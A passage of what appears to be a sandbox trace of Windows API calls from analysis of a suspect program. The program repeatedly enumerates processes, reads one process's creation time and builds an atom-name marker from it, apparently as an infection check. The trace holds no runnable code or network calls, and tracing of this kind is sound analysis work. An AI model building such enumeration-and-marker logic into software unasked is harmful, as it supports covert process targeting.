	[0076.375] CloseHandle (hObject=0x224) returned 1
	[0076.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.375] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.375] CloseHandle (hObject=0x224) returned 1
	[0076.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.375] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.375] CloseHandle (hObject=0x224) returned 1
	[0076.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.376] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.376] CloseHandle (hObject=0x224) returned 1
	[0076.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.376] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.376] CloseHandle (hObject=0x224) returned 1
	[0076.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.376] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.376] CloseHandle (hObject=0x224) returned 1
	[0076.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.376] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.376] CloseHandle (hObject=0x224) returned 1
	[0076.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.376] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.376] CloseHandle (hObject=0x224) returned 1
	[0076.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.376] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.377] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.377] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.377] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.377] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.377] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.377] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.377] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.377] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.377] CloseHandle (hObject=0x224) returned 1
	[0076.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.377] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.377] CloseHandle (hObject=0x224) returned 1
	[0076.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.378] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.378] CloseHandle (hObject=0x224) returned 1
	[0076.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.458] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.458] CloseHandle (hObject=0x224) returned 1
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.458] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.458] CloseHandle (hObject=0x224) returned 1
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.458] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.458] CloseHandle (hObject=0x224) returned 1
	[0076.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.458] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.458] CloseHandle (hObject=0x224) returned 1
	[0076.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.459] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.459] CloseHandle (hObject=0x224) returned 1
	[0076.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.459] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.459] CloseHandle (hObject=0x224) returned 1
	[0076.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.459] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.459] CloseHandle (hObject=0x224) returned 1
	[0076.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.459] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.459] CloseHandle (hObject=0x224) returned 1
	[0076.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.459] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.459] CloseHandle (hObject=0x224) returned 1
	[0076.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.459] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.460] CloseHandle (hObject=0x224) returned 1
	[0076.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.460] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.460] CloseHandle (hObject=0x224) returned 1
	[0076.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.460] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.460] CloseHandle (hObject=0x224) returned 1
	[0076.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.460] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.460] CloseHandle (hObject=0x224) returned 1
	[0076.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.460] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.460] CloseHandle (hObject=0x224) returned 1
	[0076.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.460] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.460] CloseHandle (hObject=0x224) returned 1
	[0076.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.460] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.460] CloseHandle (hObject=0x224) returned 1
	[0076.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.461] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.461] CloseHandle (hObject=0x224) returned 1
	[0076.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.461] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.461] CloseHandle (hObject=0x224) returned 1
	[0076.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.461] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.461] CloseHandle (hObject=0x224) returned 1
	[0076.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.461] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.461] CloseHandle (hObject=0x224) returned 1
	[0076.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.461] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.461] CloseHandle (hObject=0x224) returned 1
	[0076.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.461] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.461] CloseHandle (hObject=0x224) returned 1
	[0076.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.462] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.462] CloseHandle (hObject=0x224) returned 1
	[0076.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.462] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.462] CloseHandle (hObject=0x224) returned 1
	[0076.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.462] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.462] CloseHandle (hObject=0x224) returned 1
	[0076.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.462] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.462] CloseHandle (hObject=0x224) returned 1
	[0076.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.462] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.462] CloseHandle (hObject=0x224) returned 1
	[0076.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.462] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.462] CloseHandle (hObject=0x224) returned 1
	[0076.462] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.462] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.462] CloseHandle (hObject=0x224) returned 1
	[0076.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.463] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.463] CloseHandle (hObject=0x224) returned 1
	[0076.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.463] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.463] CloseHandle (hObject=0x224) returned 1
	[0076.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.463] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.463] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.463] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.463] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.463] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.464] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.464] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.464] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.464] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.464] CloseHandle (hObject=0x224) returned 1
	[0076.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.464] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.464] CloseHandle (hObject=0x224) returned 1
	[0076.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.464] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.464] CloseHandle (hObject=0x224) returned 1
	[0076.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.543] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.544] CloseHandle (hObject=0x224) returned 1
	[0076.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.544] CloseHandle (hObject=0x224) returned 1
	[0076.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.544] CloseHandle (hObject=0x224) returned 1
	[0076.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.544] CloseHandle (hObject=0x224) returned 1
	[0076.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.544] CloseHandle (hObject=0x224) returned 1
	[0076.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.544] CloseHandle (hObject=0x224) returned 1
	[0076.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.545] CloseHandle (hObject=0x224) returned 1
	[0076.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.545] CloseHandle (hObject=0x224) returned 1
	[0076.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.545] CloseHandle (hObject=0x224) returned 1
	[0076.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.545] CloseHandle (hObject=0x224) returned 1
	[0076.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.545] CloseHandle (hObject=0x224) returned 1
	[0076.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.546] CloseHandle (hObject=0x224) returned 1
	[0076.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.546] CloseHandle (hObject=0x224) returned 1
	[0076.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.546] CloseHandle (hObject=0x224) returned 1
	[0076.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.546] CloseHandle (hObject=0x224) returned 1
	[0076.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.546] CloseHandle (hObject=0x224) returned 1
	[0076.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.546] CloseHandle (hObject=0x224) returned 1
	[0076.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.546] CloseHandle (hObject=0x224) returned 1
	[0076.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.547] CloseHandle (hObject=0x224) returned 1
	[0076.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.547] CloseHandle (hObject=0x224) returned 1
	[0076.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.547] CloseHandle (hObject=0x224) returned 1
	[0076.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.547] CloseHandle (hObject=0x224) returned 1
	[0076.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.547] CloseHandle (hObject=0x224) returned 1
	[0076.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.547] CloseHandle (hObject=0x224) returned 1
	[0076.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.548] CloseHandle (hObject=0x224) returned 1
	[0076.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.548] CloseHandle (hObject=0x224) returned 1
	[0076.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.548] CloseHandle (hObject=0x224) returned 1
	[0076.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.548] CloseHandle (hObject=0x224) returned 1
	[0076.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.548] CloseHandle (hObject=0x224) returned 1
	[0076.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.548] CloseHandle (hObject=0x224) returned 1
	[0076.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.548] CloseHandle (hObject=0x224) returned 1
	[0076.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.549] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.549] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
